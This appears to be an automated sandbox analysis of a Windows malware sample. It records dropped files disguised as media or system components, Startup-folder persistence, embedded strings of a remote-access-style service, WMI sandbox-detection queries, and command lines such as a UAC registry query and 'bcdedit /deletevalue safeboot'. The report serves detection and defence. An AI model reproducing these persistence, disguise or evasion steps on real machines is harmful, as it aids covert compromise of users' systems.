Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\Tweaker\Ring0x.jpg	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\SysWOW64\en\Ri.avi	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\SysWOW64\en\In.avi	Jump to dropped file

Source: K4gsPJGEi4.exe	Binary or memory string: .exe\USOSharedUSOSharedpathCan't download temporary exe {}update_get_tempCan't open temporary exe {}update_open_tempCan't open loaded file {}update_get_temp_sizeLoading new executable from disk {}update_read_tempError decompressing memory.update_decompressCan't write decompressed dataupdate_write_decompressCan't open uncompressed fileupdate_open_temp2\updaterupdaterCan't download updater {}update_get_updaterCan't open updater {}update_open_updaterCan't get updater file size {}update_get_updater_sizeLoading updater from disk {}update_read_updaterError decompressing updater memory.update_decompress_updaterCan't write decompressed updaterupdate_write_updaterCan't create decompressed updater {}update_open_decompressed_updater" -cur_rights -install_service Stopping and removing serviceupdateStopping and/or removing serviceservice_stopcountservice terminated with {}argsStarted with {}fromInterfaceExecuting - rolling back update stateupdate_rollbackrec_txt_startedmw_btn_screenrecord_stopmw_btn_screenrecord_startrec_txt_stoppedrec_txt_failedbtn_okIntelSvcLocalIPB- Missing argument parameter: integer value is not an integerArgument floating point value is not a float valueunsigned integertruefalse must be 0/1/false/truew watchdog service with {}elevaterun_as_admin{}, Removing service-sid s start service as {}Removing serviceCan't run or install service {}elevate_servicez -service -install_service z CONOUT$terminalinstall_servicew{}, Stopping, removing and installing servicemainService installed as watchdogCan't start serviceservice_startService installationservice_install"-install_service" has no effect if running not under administrator rightsdsRunning as elevatorrunnerRunning as watchdog sericewatchdogcRunning as cad-simulatorcadaRunning by servicemode{}The app is already running.. exitingCan't elevate processcant_elevateStartbuild IntelSvc {}adminbuildmajorminorservice_packplatformidsuitetypeWindows {}, {}, {}, {}, {}, {}, {}windowslanguageEnvironment {}envsessidselectedrestartupdatedboot_modeadminserviceLaunch parameters: {}, {}, {}, {}, {}, {}, as {}, is running {}paramsWow64DisableWow64FsRedirectionWow64RevertWow64FsRedirectionbcdedit.exe/deletevalue safebootCan't run BCDEdit for clearing boot moderegistering tray window classreg_tray_wnd_classmenu_servicetray_tipRunning with no UIno_uichannelCan't create interprocess communication {}create_ipcExit, 0xGUI objects {}gui_objsminutesSpentpartnCountpartnCountLimWarnpartnCountSuspWarnpartnCountLimtimeLimWarntimeLimSuspWarntimeLimprlSesLimOutprlSesLimInfileTransfermsg1IntervalshowPPAfterSessionautoUpdatedownloadSA_CLOSEbtn_cancelupdate_requestbtn_update_noneed_okupdate_noneedSave ID to fileid.txtCan't create/open file id.txtidtxt_openidrightsAdmin wnd: {}, {}.: ID 8.8.8.8sa_ipsa_portrouter_iprouter_portproxy_ipproxy_port(la
Source: IntelSvc.exe.0.dr	Binary or memory string: .exe\USOSharedUSOSharedpathCan't download temporary exe {}update_get_tempCan't open temporary exe {}update_open_tempCan't open loaded file {}update_get_temp_sizeLoading new executable from disk {}update_read_tempError decompressing memory.update_decompressCan't write decompressed dataupdate_write_decompressCan't open uncompressed fileupdate_open_temp2\updaterupdaterCan't download updater {}update_get_updaterCan't open updater {}update_open_updaterCan't get updater file size {}update_get_updater_sizeLoading updater from disk {}update_read_updaterError decompressing updater memory.update_decompress_updaterCan't write decompressed updaterupdate_write_updaterCan't create decompressed updater {}update_open_decompressed_updater" -cur_rights -install_service Stopping and removing serviceupdateStopping and/or removing serviceservice_stopcountservice terminated with {}argsStarted with {}fromInterfaceExecuting - rolling back update stateupdate_rollbackrec_txt_startedmw_btn_screenrecord_stopmw_btn_screenrecord_startrec_txt_stoppedrec_txt_failedbtn_okIntelSvcLocalIPB- Missing argument parameter: integer value is not an integerArgument floating point value is not a float valueunsigned integertruefalse must be 0/1/false/truew watchdog service with {}elevaterun_as_admin{}, Removing service-sid s start service as {}Removing serviceCan't run or install service {}elevate_servicez -service -install_service z CONOUT$terminalinstall_servicew{}, Stopping, removing and installing servicemainService installed as watchdogCan't start serviceservice_startService installationservice_install"-install_service" has no effect if running not under administrator rightsdsRunning as elevatorrunnerRunning as watchdog sericewatchdogcRunning as cad-simulatorcadaRunning by servicemode{}The app is already running.. exitingCan't elevate processcant_elevateStartbuild IntelSvc {}adminbuildmajorminorservice_packplatformidsuitetypeWindows {}, {}, {}, {}, {}, {}, {}windowslanguageEnvironment {}envsessidselectedrestartupdatedboot_modeadminserviceLaunch parameters: {}, {}, {}, {}, {}, {}, as {}, is running {}paramsWow64DisableWow64FsRedirectionWow64RevertWow64FsRedirectionbcdedit.exe/deletevalue safebootCan't run BCDEdit for clearing boot moderegistering tray window classreg_tray_wnd_classmenu_servicetray_tipRunning with no UIno_uichannelCan't create interprocess communication {}create_ipcExit, 0xGUI objects {}gui_objsminutesSpentpartnCountpartnCountLimWarnpartnCountSuspWarnpartnCountLimtimeLimWarntimeLimSuspWarntimeLimprlSesLimOutprlSesLimInfileTransfermsg1IntervalshowPPAfterSessionautoUpdatedownloadSA_CLOSEbtn_cancelupdate_requestbtn_update_noneed_okupdate_noneedSave ID to fileid.txtCan't create/open file id.txtidtxt_openidrightsAdmin wnd: {}, {}.: ID 8.8.8.8sa_ipsa_portrouter_iprouter_portproxy_ipproxy_port(la
Source: IntelSvc.exe1.15.dr	Binary or memory string: .exe\USOSharedUSOSharedpathCan't download temporary exe {}update_get_tempCan't open temporary exe {}update_open_tempCan't open loaded file {}update_get_temp_sizeLoading new executable from disk {}update_read_tempError decompressing memory.update_decompressCan't write decompressed dataupdate_write_decompressCan't open uncompressed fileupdate_open_temp2\updaterupdaterCan't download updater {}update_get_updaterCan't open updater {}update_open_updaterCan't get updater file size {}update_get_updater_sizeLoading updater from disk {}update_read_updaterError decompressing updater memory.update_decompress_updaterCan't write decompressed updaterupdate_write_updaterCan't create decompressed updater {}update_open_decompressed_updater" -cur_rights -install_service Stopping and removing serviceupdateStopping and/or removing serviceservice_stopcountservice terminated with {}argsStarted with {}fromInterfaceExecuting - rolling back update stateupdate_rollbackrec_txt_startedmw_btn_screenrecord_stopmw_btn_screenrecord_startrec_txt_stoppedrec_txt_failedbtn_okIntelSvcLocalIPB- Missing argument parameter: integer value is not an integerArgument floating point value is not a float valueunsigned integertruefalse must be 0/1/false/truew watchdog service with {}elevaterun_as_admin{}, Removing service-sid s start service as {}Removing serviceCan't run or install service {}elevate_servicez -service -install_service z CONOUT$terminalinstall_servicew{}, Stopping, removing and installing servicemainService installed as watchdogCan't start serviceservice_startService installationservice_install"-install_service" has no effect if running not under administrator rightsdsRunning as elevatorrunnerRunning as watchdog sericewatchdogcRunning as cad-simulatorcadaRunning by servicemode{}The app is already running.. exitingCan't elevate processcant_elevateStartbuild IntelSvc {}adminbuildmajorminorservice_packplatformidsuitetypeWindows {}, {}, {}, {}, {}, {}, {}windowslanguageEnvironment {}envsessidselectedrestartupdatedboot_modeadminserviceLaunch parameters: {}, {}, {}, {}, {}, {}, as {}, is running {}paramsWow64DisableWow64FsRedirectionWow64RevertWow64FsRedirectionbcdedit.exe/deletevalue safebootCan't run BCDEdit for clearing boot moderegistering tray window classreg_tray_wnd_classmenu_servicetray_tipRunning with no UIno_uichannelCan't create interprocess communication {}create_ipcExit, 0xGUI objects {}gui_objsminutesSpentpartnCountpartnCountLimWarnpartnCountSuspWarnpartnCountLimtimeLimWarntimeLimSuspWarntimeLimprlSesLimOutprlSesLimInfileTransfermsg1IntervalshowPPAfterSessionautoUpdatedownloadSA_CLOSEbtn_cancelupdate_requestbtn_update_noneed_okupdate_noneedSave ID to fileid.txtCan't create/open file id.txtidtxt_openidrightsAdmin wnd: {}, {}.: ID 8.8.8.8sa_ipsa_portrouter_iprouter_portproxy_ipproxy_port(la
Source: tv_x86.exe.15.dr	Binary or memory string: .exe\USOSharedUSOSharedpathCan't download temporary exe {}update_get_tempCan't open temporary exe {}update_open_tempCan't open loaded file {}update_get_temp_sizeLoading new executable from disk {}update_read_tempError decompressing memory.update_decompressCan't write decompressed dataupdate_write_decompressCan't open uncompressed fileupdate_open_temp2\updaterupdaterCan't download updater {}update_get_updaterCan't open updater {}update_open_updaterCan't get updater file size {}update_get_updater_sizeLoading updater from disk {}update_read_updaterError decompressing updater memory.update_decompress_updaterCan't write decompressed updaterupdate_write_updaterCan't create decompressed updater {}update_open_decompressed_updater" -cur_rights -install_service Stopping and removing serviceupdateStopping and/or removing serviceservice_stopcountservice terminated with {}argsStarted with {}fromInterfaceExecuting - rolling back update stateupdate_rollbackrec_txt_startedmw_btn_screenrecord_stopmw_btn_screenrecord_startrec_txt_stoppedrec_txt_failedbtn_okIntelSvcLocalIPB- Missing argument parameter: integer value is not an integerArgument floating point value is not a float valueunsigned integertruefalse must be 0/1/false/truew watchdog service with {}elevaterun_as_admin{}, Removing service-sid s start service as {}Removing serviceCan't run or install service {}elevate_servicez -service -install_service z CONOUT$terminalinstall_servicew{}, Stopping, removing and installing servicemainService installed as watchdogCan't start serviceservice_startService installationservice_install"-install_service" has no effect if running not under administrator rightsdsRunning as elevatorrunnerRunning as watchdog sericewatchdogcRunning as cad-simulatorcadaRunning by servicemode{}The app is already running.. exitingCan't elevate processcant_elevateStartbuild IntelSvc {}adminbuildmajorminorservice_packplatformidsuitetypeWindows {}, {}, {}, {}, {}, {}, {}windowslanguageEnvironment {}envsessidselectedrestartupdatedboot_modeadminserviceLaunch parameters: {}, {}, {}, {}, {}, {}, as {}, is running {}paramsWow64DisableWow64FsRedirectionWow64RevertWow64FsRedirectionbcdedit.exe/deletevalue safebootCan't run BCDEdit for clearing boot moderegistering tray window classreg_tray_wnd_classmenu_servicetray_tipRunning with no UIno_uichannelCan't create interprocess communication {}create_ipcExit, 0xGUI objects {}gui_objsminutesSpentpartnCountpartnCountLimWarnpartnCountSuspWarnpartnCountLimtimeLimWarntimeLimSuspWarntimeLimprlSesLimOutprlSesLimInfileTransfermsg1IntervalshowPPAfterSessionautoUpdatedownloadSA_CLOSEbtn_cancelupdate_requestbtn_update_noneed_okupdate_noneedSave ID to fileid.txtCan't create/open file id.txtidtxt_openidrightsAdmin wnd: {}, {}.: ID 8.8.8.8sa_ipsa_portrouter_iprouter_portproxy_ipproxy_port(la
Source: Null11.15.dr	Binary or memory string: 'C:\Windows\System32\bcdedit.exe' is not recognized as an internal or external command,
Source: IntelSvc.exe0.15.dr	Binary or memory string: .exe\USOSharedUSOSharedpathCan't download temporary exe {}update_get_tempCan't open temporary exe {}update_open_tempCan't open loaded file {}update_get_temp_sizeLoading new executable from disk {}update_read_tempError decompressing memory.update_decompressCan't write decompressed dataupdate_write_decompressCan't open uncompressed fileupdate_open_temp2\updaterupdaterCan't download updater {}update_get_updaterCan't open updater {}update_open_updaterCan't get updater file size {}update_get_updater_sizeLoading updater from disk {}update_read_updaterError decompressing updater memory.update_decompress_updaterCan't write decompressed updaterupdate_write_updaterCan't create decompressed updater {}update_open_decompressed_updater" -cur_rights -install_service Stopping and removing serviceupdateStopping and/or removing serviceservice_stopcountservice terminated with {}argsStarted with {}fromInterfaceExecuting - rolling back update stateupdate_rollbackrec_txt_startedmw_btn_screenrecord_stopmw_btn_screenrecord_startrec_txt_stoppedrec_txt_failedbtn_okIntelSvcLocalIPB- Missing argument parameter: integer value is not an integerArgument floating point value is not a float valueunsigned integertruefalse must be 0/1/false/truew watchdog service with {}elevaterun_as_admin{}, Removing service-sid s start service as {}Removing serviceCan't run or install service {}elevate_servicez -service -install_service z CONOUT$terminalinstall_servicew{}, Stopping, removing and installing servicemainService installed as watchdogCan't start serviceservice_startService installationservice_install"-install_service" has no effect if running not under administrator rightsdsRunning as elevatorrunnerRunning as watchdog sericewatchdogcRunning as cad-simulatorcadaRunning by servicemode{}The app is already running.. exitingCan't elevate processcant_elevateStartbuild IntelSvc {}adminbuildmajorminorservice_packplatformidsuitetypeWindows {}, {}, {}, {}, {}, {}, {}windowslanguageEnvironment {}envsessidselectedrestartupdatedboot_modeadminserviceLaunch parameters: {}, {}, {}, {}, {}, {}, as {}, is running {}paramsWow64DisableWow64FsRedirectionWow64RevertWow64FsRedirectionbcdedit.exe/deletevalue safebootCan't run BCDEdit for clearing boot moderegistering tray window classreg_tray_wnd_classmenu_servicetray_tipRunning with no UIno_uichannelCan't create interprocess communication {}create_ipcExit, 0xGUI objects {}gui_objsminutesSpentpartnCountpartnCountLimWarnpartnCountSuspWarnpartnCountLimtimeLimWarntimeLimSuspWarntimeLimprlSesLimOutprlSesLimInfileTransfermsg1IntervalshowPPAfterSessionautoUpdatedownloadSA_CLOSEbtn_cancelupdate_requestbtn_update_noneed_okupdate_noneedSave ID to fileid.txtCan't create/open file id.txtidtxt_openidrightsAdmin wnd: {}, {}.: ID 8.8.8.8sa_ipsa_portrouter_iprouter_portproxy_ipproxy_port(la
Source: In.avi.15.dr	Binary or memory string: .exe\USOSharedUSOSharedpathCan't download temporary exe {}update_get_tempCan't open temporary exe {}update_open_tempCan't open loaded file {}update_get_temp_sizeLoading new executable from disk {}update_read_tempError decompressing memory.update_decompressCan't write decompressed dataupdate_write_decompressCan't open uncompressed fileupdate_open_temp2\updaterupdaterCan't download updater {}update_get_updaterCan't open updater {}update_open_updaterCan't get updater file size {}update_get_updater_sizeLoading updater from disk {}update_read_updaterError decompressing updater memory.update_decompress_updaterCan't write decompressed updaterupdate_write_updaterCan't create decompressed updater {}update_open_decompressed_updater" -cur_rights -install_service Stopping and removing serviceupdateStopping and/or removing serviceservice_stopcountservice terminated with {}argsStarted with {}fromInterfaceExecuting - rolling back update stateupdate_rollbackrec_txt_startedmw_btn_screenrecord_stopmw_btn_screenrecord_startrec_txt_stoppedrec_txt_failedbtn_okIntelSvcLocalIPB- Missing argument parameter: integer value is not an integerArgument floating point value is not a float valueunsigned integertruefalse must be 0/1/false/truew watchdog service with {}elevaterun_as_admin{}, Removing service-sid s start service as {}Removing serviceCan't run or install service {}elevate_servicez -service -install_service z CONOUT$terminalinstall_servicew{}, Stopping, removing and installing servicemainService installed as watchdogCan't start serviceservice_startService installationservice_install"-install_service" has no effect if running not under administrator rightsdsRunning as elevatorrunnerRunning as watchdog sericewatchdogcRunning as cad-simulatorcadaRunning by servicemode{}The app is already running.. exitingCan't elevate processcant_elevateStartbuild IntelSvc {}adminbuildmajorminorservice_packplatformidsuitetypeWindows {}, {}, {}, {}, {}, {}, {}windowslanguageEnvironment {}envsessidselectedrestartupdatedboot_modeadminserviceLaunch parameters: {}, {}, {}, {}, {}, {}, as {}, is running {}paramsWow64DisableWow64FsRedirectionWow64RevertWow64FsRedirectionbcdedit.exe/deletevalue safebootCan't run BCDEdit for clearing boot moderegistering tray window classreg_tray_wnd_classmenu_servicetray_tipRunning with no UIno_uichannelCan't create interprocess communication {}create_ipcExit, 0xGUI objects {}gui_objsminutesSpentpartnCountpartnCountLimWarnpartnCountSuspWarnpartnCountLimtimeLimWarntimeLimSuspWarntimeLimprlSesLimOutprlSesLimInfileTransfermsg1IntervalshowPPAfterSessionautoUpdatedownloadSA_CLOSEbtn_cancelupdate_requestbtn_update_noneed_okupdate_noneedSave ID to fileid.txtCan't create/open file id.txtidtxt_openidrightsAdmin wnd: {}, {}.: ID 8.8.8.8sa_ipsa_portrouter_iprouter_portproxy_ipproxy_port(la
Source: Start.cmd.0.dr	Binary or memory string: %WINDIR%\System32\bcdedit.exe /deletevalue safeboot>nul 2>nul

Boot Survival

Drops PE files to the user root directory

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\Public\cmdow.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\Public\RtkAudio.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\Public\WinRing0x64.sys	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\Public\screen.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\Public\IntelSvc.exe	Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\d.txt

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\d.txt			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d.txt			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\screen.exe

Code function: 18_2_0040EE9C LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

18_2_0040EE9C

Source: C:\Users\user\Desktop\K4gsPJGEi4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)

Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Service WHERE name like 'ServiceNetwork'
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Service WHERE name like 'loadhost Service'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Service WHERE name like 'loadhost'
Source: C:\Windows\SysWOW64\timeout.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Service WHERE name like 'ServiceNetwork'
Source: C:\Windows\SysWOW64\cmd.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Service WHERE name like 'ServiceNetwork'
Source: C:\Windows\SysWOW64\cmd.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Service WHERE name like 'loadhost Service'
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Service WHERE name like 'ServiceNetwork'
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Service WHERE name like 'loadhost Service'
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Service WHERE name like 'Intel(R) Utiliti'

Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\Public\cmdow.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Windows\SysWOW64\en\Ri.avi	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\Public\WinRing0x64.sys	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\WinRing0x64.sys	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Tweaker\IntelS.jpg	Jump to dropped file
Source: C:\Users\user\Desktop\K4gsPJGEi4.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IntelSvc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\K4gsPJGEi4.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RtkAudio.txt	Jump to dropped file
Source: C:\Users\user\Desktop\K4gsPJGEi4.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Systemfont.txt	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\Public\IntelSvc.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\ProgramData\IntelSvc.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Windows\SysWOW64\en\Au.avi	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\tv_x86.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Tweaker\cmdo.jpg	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Tfile\IntelSvc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\K4gsPJGEi4.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\cmdow.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Windows\SysWOW64\en\In.avi	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\Public\RtkAudio.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Windows\SysWOW64\en\Sy.avi	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Tweaker\Systemfo.jpg	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Windows\SysWOW64\en\cm.avi	Jump to dropped file
Source: C:\Users\user\Desktop\K4gsPJGEi4.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\WinRing0x64.txt	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Systemfont.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RtkAudio.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Windows\SysWOW64\RuntimeBroker.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Tweaker\Aud.jpg	Jump to dropped file
Source: C:\Users\user\Desktop\K4gsPJGEi4.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\OneDrive\fontdrvhots.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Tweaker\Ring0x.jpg	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\ProgramData\cmdow.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Tfile\RtkAudio.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\screen.exe

API coverage: 2.4 %

Source: C:\Windows\SysWOW64\timeout.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Source: C:\Windows\SysWOW64\timeout.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\screen.exe	Code function: 18_2_004024C1 FindFirstFileA,FindNextFileA,FindClose,		18_2_004024C1
Source: C:\Users\user\AppData\Local\Temp\screen.exe	Code function: 18_2_004030D0 FindFirstFileA,FindNextFileA,strlen,strlen,		18_2_004030D0

Source: K4gsPJGEi4.exe, 00000000.00000002.2167132442.0000000001172000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: _VMware_8j

Source: C:\Windows\SysWOW64\wbem\WMIC.exe

Process information queried: ProcessInformation

Source: C:\Users\user\AppData\Local\Temp\screen.exe

Code function: 18_2_004044CF LoadLibraryA,GetProcAddress,

18_2_004044CF

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: K4gsPJGEi4.exe PID: 3652, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Start.cmd, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\two.cmd, type: DROPPED

Source: C:\Users\user\AppData\Local\Temp\screen.exe	Code function: memset,memset,GetWindowsDirectoryA,strlen,strlen,FindWindowA,GetWindowThreadProcessId,OpenProcess,CloseHandle,CloseHandle,PostMessageA,EnumWindows,memset,memset,MultiByteToWideChar,CloseHandle,memset,FindWindowA,GetWindowThreadProcessId,PostMessageA,memset,CreateProcessA,FreeLibrary, Explorer.exe		18_2_00404738
Source: C:\Users\user\AppData\Local\Temp\screen.exe	Code function: memset,memset,GetWindowsDirectoryA,strlen,strlen,FindWindowA,GetWindowThreadProcessId,OpenProcess,CloseHandle,CloseHandle,PostMessageA,EnumWindows,memset,memset,MultiByteToWideChar,CloseHandle,memset,FindWindowA,GetWindowThreadProcessId,PostMessageA,memset,CreateProcessA,FreeLibrary, Explorer.exe		18_2_00404738

Source: C:\Users\user\Desktop\K4gsPJGEi4.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Start.cmd" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\Start.cmd"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe query "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\find.exe C:\Windows\System32\find.exe "0x0"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\est1.vbs"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\System32\timeout.exe /t 1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c type "C:\Users\user\AppData\Local\Temp\Start.cmd"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Vnoad.vbs"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\System32\timeout.exe /t 1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\System32\timeout.exe /t 1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001	Jump to behavior
